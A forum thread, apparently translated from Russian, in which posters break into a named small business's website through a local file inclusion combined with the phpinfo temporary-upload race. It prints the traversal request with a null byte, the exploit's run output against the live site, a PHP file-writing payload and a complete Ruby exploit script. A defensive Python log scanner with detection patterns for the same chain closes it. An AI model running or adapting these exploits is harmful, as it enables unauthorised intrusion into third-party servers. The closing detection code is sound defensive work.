Link to phpinfo: http://www.cloud9(АНТИГУГОЛ)cycles.com/info.php
Link with the include: http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../etc/passwd%00
I'm using the LFI-via-phpinfo exploit taken from here: https://rdot.org/forum/showpost.php?p=12621&postcount=2
Code:
C:\Windows\system32>perl C:\lfi.pl http://www.cloud9(АНТИГУГОЛ)cycles.com/info.php http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../etc/passwd%00
Generating huge headers [headers ready]
Setting buffer size [512]
Sending request [request sent]
HTTP/1.1 200 OK
Reading.........................................................................
Got filename: /tmp/phpROHVzd
Including...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html>
<head>
<title>Cloud 9 Cycles</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta name="description" content="" />
<script type="text/javascript">
<!--
if (top.location!= self.location) { top.location = self.location.href }
//-->
</script>
<script type="text/javascript" src="fx/js/jquery-1.3.2.js"></script>
<script type="text/javascript" src="fx/js/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="fx/js/jquery.fancybox-1.3.1.pack.js"></script>
<script type="text/javascript" src="fx/js/pngfix.js"></script>
<script type="text/javascript" src="fx/js/skrypty.js"></script>
<link href="fx/css/jquery.fancybox-1.3.1.css" type="text/css" rel="stylesheet" media="screen" />
<link href="fx/css/main.css" type="text/css" rel="stylesheet" />
</head>
<body class="avant" style="background: url(fx/gfx/bg/../../../../../../tmp/phpROHVzd .jpg) center no-repeat #000 fixed ">
<div id="kontener">
<div id="top">
<div style="position: relative; top: 8px; left: 15px">
<a href="http://www.facebook.com/pages/Cloud-9-Cycles/158029180960878"><img style="margin: 0px 10px 0 0px;" src="fx/gfx/fb.gif"></a>
<a href="http://twitter.com/#!/Cloud9cycles"><img style="margin: 0px 520px 0 0px;" src="fx/gfx/tw.gif"></a>
<a href="https://twitter.com/Cloud9Cycles" class="twitter-follow-button" data-width="230px" data-button="grey" data-text-color="#FFFFFF" data-link-color="#00AEFF">Follow @Cloud9Cycles</a>
<script src="//platform.twitter.com/widgets.js" type="text/javascript"></script>
<iframe src="//www.facebook.com/plugins/like.php?href=http://www.facebook.com/pages/Cloud-9-Cycles/158029180960878&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:85px; height:21px;" allowTransparency="true"></iframe>
<div class="clear"></div>
</div>
<a href="index.php?content=home" title="Back to home page"><img src="fx/gfx/logo.png" alt="Cloud9Cycles logo"></a>
<div id="baner-menu-box">
<div id="baner-top" ></div>
<div id="menu">
<span>
<a href="index.php" title="Back to home page" onmouseover="this.style.color='#fff'" onmouseout="this.style.color='#000'">home</a>
-- <a href="index.php?content=custom" title="Custom builds" onmouseover="this.style.color='#fff'" onmouseout="this.style.color='#000'">custom builds</a>
-- <a href="index.php?content=bikes" title="Browse our Bikes" onmouseover="this.style.color='#fff'" onmouseout="this.style.color='#000'">bikes</a>
-- <a href="index.php?content=service" title="Servicing" onmouseover="this.style.color='#fff'" onmouseout="this.style.color='#000'">servicing</a>
-- <a href="index.php?content=rent" title="Rent a bike" onmouseover="this.style.color='#fff'" onmouseout="this.style.color='#000'">bike rental</a>
-- <a href="http://www.cloud9cycles.blogspot.com" title="Cloud 9 Cycles blog" onmouseover="this.style.color='#fff'" onmouseout="this.style.color='#000'">blog</a>
-- <a href="index.php?content=contact" title="Contact us" onmouseover="this.style.color='#fff'" onmouseout="this.style.color='#000'">contact us</a>
</span>
</div>
<div id="baner-bottom" ></div>
</div>
</div>
<div class="clear"></div>
<div id="content">
hello<br>
Keeping file /tmp/phpROHVzd in tmp, use it as long as you need it
...............................................................................

I'm trying to include /tmp/phpROHVzd:
http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../tmp/phpROHVzd%00
and nothing comes out =( What could the problem be??
Everything works, though the file in /tmp/ doesn't live long. I have a self-written exploit for phpinfo; as the payload I added this to it:
<?php file_put_contents('/tmp/qwerty.lol','<?php phpinfo(); ?>'); ?>
Result: http://www.cloud(дщд)9cycles.com/index.php?content=../../../../../../tmp/qwerty.lol%00
The file creation in /tmp is done by phpinfo(); it's enough to pass the script the file contents, something like that.
Something like this, I don't know how to explain it.
Code:
require 'socket'
require 'uri'
require 'net/http'

def main()
  # setting up
  puts "SETTING UP"
  target = 'http://www/phpinfo.php'        # phpinfo()
  lfi = 'http://www/include.php?file='     # LFI template like http://www.host.com/data/lfi.php?location={LFI}
  payloadLocation = 'payload.txt'          # payload
  junkFilesCount = 50                      # tail
  recvBufferSize = 1024                    # receive buffer size

  # just echo for u
  printDotted(' -target:')
  print("[#{target}]\n")
  printDotted(' -lfi:')
  print("[#{lfi}]\n")
  printDotted(' -payload:')
  print("[#{payloadLocation}]\n")
  printDotted(' -junk files count:')
  print("[#{junkFilesCount}]\n")
  printDotted(' -receive buffer size:')
  print("[#{recvBufferSize}]\n")

  # try to load payload
  begin
    printDotted('LOAD PAYLOAD')
    payload = IO.read(payloadLocation)
    print("[OK]\n")
  rescue
    print("[ERROR]\n")
    return
  end

  # payload
  file = "-----------------------------89q8834898293409rw29\r\n"
  file += "Content-Disposition: form-data; name=\"file_loader\"; filename=\"\r\npayload.txt\"\r\n"
  file += "Content-Type: text/plain\r\n\r\n"
  file += "#{payload}\r\n"
  file += "-----------------------------89q8834898293409rw29\r\n"

  # generate junk files
  printDotted('PREPARE JUNK')
  curJunkFiles = 0
  for junkFiles in 0..junkFilesCount
    file += "-----------------------------89q8834898293409rw29\r\n"
    file += "Content-Disposition: form-data; name=\"file" + rand(10000).to_s + "\"; filename=\"\r\njunk" + rand(1000000).to_s * 10000 + ".txt\"\r\n"
    file += "Content-Type: text/plain\r\n\r\n"
    file += "superslow\r\n"
    file += "-----------------------------89q8834898293409rw29\r\n"
  end
  print("[OK]\n")

  printDotted('prepare headers')
  targetURI = URI(target)
  query = targetURI.path
  # add query if not empty
  if !targetURI.query.nil?
    query += '?' + targetURI.query
  end

  # headers
  req = "POST #{query} HTTP/1.0\r\n"
  req += "Content-Type: multipart/form-data; boundary=---------------------------89q8834898293409rw29\r\n"
  req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
  req += "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\r\n"
  req += "Host: #{targetURI.host}\r\n"
  req += "Content-Length: #{file.length}\r\n"
  req += "Connection: Close\r\n\r\n"
  req += file
  print("[OK]\n")

  # create tcp socket
  sock = Socket.new(:INET, :STREAM)
  # and set receive buffer size
  sock.setsockopt(Socket::SOL_SOCKET, Socket::SO_RCVBUF, recvBufferSize)
  printDotted('connecting to')
  begin
    sock.connect(Socket.pack_sockaddr_in(80, targetURI.host))
  rescue
    print("[ERROR]\n")
    return false
  end
  print("[OK]\n")
  sock.write(req)

  data = ''
  payloadFound = false
  loaderFound = false
  payloadFileName = ''
  loaderFileName = ''
  while true
    printDotted("get next #{recvBufferSize} bytes")
    tmpData = sock.recv(recvBufferSize)
    print("[OK]\n")
    # recv returns an empty string (not nil) once the server closes the connection
    if tmpData.nil? || tmpData.empty?
      break
    end
    data += tmpData
    tmpFileName = data.scan(/\[name\]\s=>\spayload.txt\n\s\s\s\s\[type\]\s=>\stext\/plain\n\s\s\s\s\[tmp_name\]\s=>\s(.*?)\n\s\s\s\s\[error\]/)
    if tmpFileName.length > 0
      payloadFound = true
      payloadFileName = tmpFileName[0][0].clone
      printDotted('payload file location:')
      print('[' + payloadFileName + ']' + "\n")
      lfi += payloadFileName + '%00'
      lfiURI = URI(lfi)
      printDotted("Include #{payloadFileName}")
      response = Net::HTTP.get_response(lfiURI)
      if !response.is_a?(Net::HTTPOK) then
        print("[ERROR]\n")
        return
      else
        print("[OK]\n")
      end
      return
    end
  end
end

def printDotted(msg)
  print msg + "." * (50 - msg.length)
end

main()
It's not phpinfo() that performs such "manipulations" but the interpreter; phpinfo merely serves as the link that, under certain circumstances, lets you see the path to the temporary file.
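A defender-side counterpart to the chain discussed in this thread: an added example, not code from the thread or from any of its posters, that scans web-server access log lines for the request pattern the posts describe (traversal plus a null byte in the include parameter, a POST to a phpinfo page, and an include of a /tmp/php* temporary upload) and correlates them per source IP. The log lines, IPs, timestamps and the temp file name are constructed for the example; the list of phpinfo page names is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Apache combined-format request line: client IP, timestamp, method, URL, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)

# Assumption: script names commonly used for a phpinfo() dump page.
PHPINFO_PAGES = {"info.php", "phpinfo.php", "test.php"}

# Constructed sample log (not from the thread): one benign visitor and one
# client walking through the whole phpinfo + LFI chain.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2013:12:00:01 +0000] "GET /index.php?content=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2013:12:00:05 +0000] "GET /index.php?content=../../../../../../etc/passwd%00 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2013:12:00:06 +0000] "POST /info.php HTTP/1.0" 200 98304 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2013:12:00:06 +0000] "GET /index.php?content=../../../../../../tmp/phpAbC123%00 HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2013:12:01:00 +0000] "GET /index.php?content=bikes HTTP/1.1" 200 7200 "-" "Mozilla/5.0"
"""


def decode_twice(s):
    """Percent-decode twice so double-encoded payloads (%252e%252e%252f, %2500) are seen too."""
    return unquote(unquote(s))


def classify_request(method, url):
    """Return the set of indicator names that match one request line."""
    parts = urlsplit(url)
    path, query = parts.path, parts.query
    decoded = decode_twice(query)
    reasons = set()
    # Two or more parent-directory hops in a parameter: path traversal.
    if decoded.count("../") >= 2 or decoded.count("..\\") >= 2:
        reasons.add("traversal")
    # %00 decodes to a NUL byte; used to cut off a suffix the application appends.
    if "\x00" in decoded:
        reasons.add("null_byte")
    # Inclusion of a PHP upload temp file (php<random> under /tmp).
    if "/tmp/php" in decoded:
        reasons.add("tmp_include")
    # A POST with a body to a phpinfo page is the "spray uploads, read tmp_name" half of the chain.
    if method == "POST" and path.rsplit("/", 1)[-1].lower() in PHPINFO_PAGES:
        reasons.add("phpinfo_post")
    return reasons


def scan_log(text):
    """Parse each log line and keep the ones carrying at least one indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-matching line; skip rather than crash
        reasons = classify_request(m["method"], m["url"])
        if reasons:
            findings.append({
                "ip": m["ip"],
                "url": m["url"],
                "status": int(m["status"]),
                "reasons": sorted(reasons),
            })
    return findings


def correlate(findings):
    """Group indicators per source IP; flag IPs that showed both halves of the chain."""
    per_ip = defaultdict(set)
    for f in findings:
        per_ip[f["ip"]].update(f["reasons"])
    chains = sorted(ip for ip, r in per_ip.items() if {"phpinfo_post", "tmp_include"} <= r)
    return {ip: sorted(r) for ip, r in per_ip.items()}, chains


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], ",".join(h["reasons"]), h["url"])
    per_ip, chains = correlate(hits)
    print("phpinfo+LFI chain seen from:", chains)
```

The per-IP correlation matters more than any single rule: a lone traversal attempt is noisy scanner traffic, but a POST to a phpinfo page followed within seconds by an include of /tmp/php* from the same client is the specific sequence this thread describes, and the 200 status on the include is the confirmation that the temp file was still present when it was requested.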